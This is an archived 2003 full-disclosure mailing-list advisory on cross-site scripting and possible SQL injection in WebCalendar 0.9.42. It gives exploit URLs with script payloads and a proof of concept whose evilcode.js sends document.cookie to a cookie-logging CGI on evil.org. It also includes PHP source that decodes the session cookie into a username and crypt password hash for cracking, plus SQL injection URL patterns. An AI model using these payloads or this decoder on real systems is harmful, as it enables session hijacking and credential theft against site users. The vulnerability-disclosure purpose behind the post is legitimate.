lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030903164648.GA70074@ak.texas-shooters.com>
From: nocon at texas-shooters.com (noconflic)
Subject: Webcalendar <= 0.9.42 Cross Site Scripting Attacks and Potential SQL Injection Attack



-------------- next part --------------
Webcalendar <= 0.9.42
http://webcalendar.sourceforge.net/

  WebCalendar is a PHP application used to maintain a calendar for one or more persons


Cross Site Scripting
========================================

Files (Mabe Others):
----------------------------
includes/js/colors.php

Code Sniplet:
[...]
   window.opener.document.prefform.<?php echo $color?>.value= color;
[...]


Exploit: 
---------------------------
http://www.host.name/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>


Files (Mabe Others):
-------------------------
week.php

Code sniplet:
[...]
  echo html_for_add_icon (  date ( "Ymd", $days[$d] ), $time_h, $time_m, $user );
[...]

Exploit:
--------------------
http://www.host.name/webcalendar/week.php?user="><script>alert(document.cookie)</script>


Files (Mabe Others): 
-------------------------
day.php month.php week_details.php view_l.php view_m.php view_t.php view_v.php 
view_w.php week_details.php 

Code Sniplet:
[...]
  echo $eventinfo;
[...]

Exploit:
----------------
http://www.host.name/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>


POC:
-----------------
http://www.host.name/webcalendar/week.php?eventinfo=<script src=http://www.evil.org/evilcode.js</script>

"evilcode.js"
<--------------->
window.open('http://www.evil.org/cgi-bin/logcookie.cgi?'+document.cookie);
<--------------->

  We can then use the code provided in the files includes/functions.php and includes/validate.php
to decode the "webcalendar_session" hash taken from the cookie. PHP source to
decode the hash should be attached. 

>From functions.php:
<----------------->
// Extract a user's name from a session id
// This is a lame attempt at security.  Otherwise, users would be
// able to edit their cookies.txt file and set the username in plain
// text.
<----------------->

Source: http://nocon.darkflame.net/CSS/decode.txt 
Demo:   http://nocon.darkflame.net/CSS/decode.php

   Example: 
       
     webcalendar_session=838ea889b26c9772819d709b826e7b8f926d;

     Hash: 838ea889b26c9772819d709b826e7b8f926d
     Decoded: 
        Login: demo
        Passw: Mn7ggQrGTEpi2 

  We can then run a standard unix password cracking program on "Mn7ggQrGTEpi2" 


Potential SQL Injection:
============================

  This seems to affect the view_t.php, view_w.php, view_v.php and maybee 
  others. 

http://www.host.name/webcalendar/view_m.php?id=additional sql command

   If "magic quotes" is set to off, then login.php is also vulnerable.

http://www.host.name/webcalendar/login.php?user='additional%20sqlcommand
http://www.host.name/webcalendar/login.php?password='additional%20sql%20command


----------------------------------------------------------------------------------------

Author Contacted on: Tue, 29 Jul 2003
Response: 

From: Craig Knudsen <cknudsen@...udsen.com>
Subject: Re: Webcalendar Vulnerabilities

The source of most of these security issues is the use of global
variables, which seemed to be the way to back in PHP3.  I've tried to
maintain compatibility to PHP3, but I'm thinking it's not worth the
security risks at this point.  I will likely drop the use of global
variables in one of the next couple of releases.

In the mean time, I'll take a look at the issues you've listed here.  
 
Thanks.
Craig

Requested Update on: Tue, 2 Sep 2003
Response: NONE

----------------------------------------------------------------------------------------


Advisory: 
http://nocon.darkflame.net/CSS/Wecalendar.txt

Addtional Resources:

- WWW Security White Paper
  http://www.discover.co.uk/www-secuirity.html
        
- Perl: http://www.developer.com/lang/article.php/861781
- PHP:  http://www.phpadvisory.com/articles/view.phtml?ID=5
- SQL Injection:
  http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
        
- HTML Code Injection and Cross-site scripting
  http://www.technicalinfo.net/papers/CSS.html
           
- Google is your friend ;)
  http://www.google.com


- nocon
Date: Wed Sep 3 2003
http://nocon.darkflame.net/

-------------- next part --------------
<head>
    <title> Webcalendar Cookie Decode </title>
</head>

<form method=post action="<? echo $PHP_SELF ?>">
<table width="200" border="0" cellspacing="1" cellpadding="0" bgcolor="#000000">
<tr><td>
   <table width="100%" border="0" cellspacing="2" cellpadding="2" bgcolor="#FFFFFF">
      <tr align="center">
        <td colspan="2">Webcalendar Cookie Decode <br> <a href=http://nocon.darkflame.net/>
        http://nocon.darkflame.net/</a> <br><br>
       </td>
      </tr>
     <tr>
    <td><strong>Hash</strong></td>  
    <td align="right"><input type="text" name="hash" size="60"></td>
   </tr>
<tr>
    <td>&nbsp;</td>
    <td align="center"> <input type="submit" value="Decode"></td>
</tr>
</table>
    </td>
</tr>
</table>
</form>

<?php

$encoded_login = $HTTP_POST_VARS['hash'];
$offsets = array ( 31, 41, 59, 26, 54 );

function hextoint ( $val ) {
  if ( empty ( $val ) )
    return 0;
  switch ( strtoupper ( $val ) ) {
    case "0": return 0;
    case "1": return 1;
    case "2": return 2;
    case "3": return 3;
    case "4": return 4;
    case "5": return 5;
    case "6": return 6;
    case "7": return 7;
    case "8": return 8;
    case "9": return 9;
    case "A": return 10;
    case "B": return 11;
    case "C": return 12;
    case "D": return 13;
    case "E": return 14;
    case "F": return 15;
  }
  return 0;
}

function decode_string ( $instr ) {
  global $offsets;
  $orig = "";
  for ( $i = 0; $i < strlen ( $instr ); $i += 2 ) {
    $ch1 = substr ( $instr, $i, 1 );
    $ch2 = substr ( $instr, $i + 1, 1 );
    $val = hextoint ( $ch1 ) * 16 + hextoint ( $ch2 );
    $j = ( $i / 2 ) % count ( $offsets );
    $newval = $val - $offsets[$j] + 256;
    $newval %= 256;
    $dec_ch = chr ( $newval );
    $orig .= $dec_ch;
  }
  return $orig;
}

$login_pw = split('\|', decode_string ($encoded_login));
$login = $login_pw[0];
$cryptpw = $login_pw[1];

echo "<b> Login:</b> $login <br>";
echo "<b> Passw:</b> $cryptpw <br>";

?>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ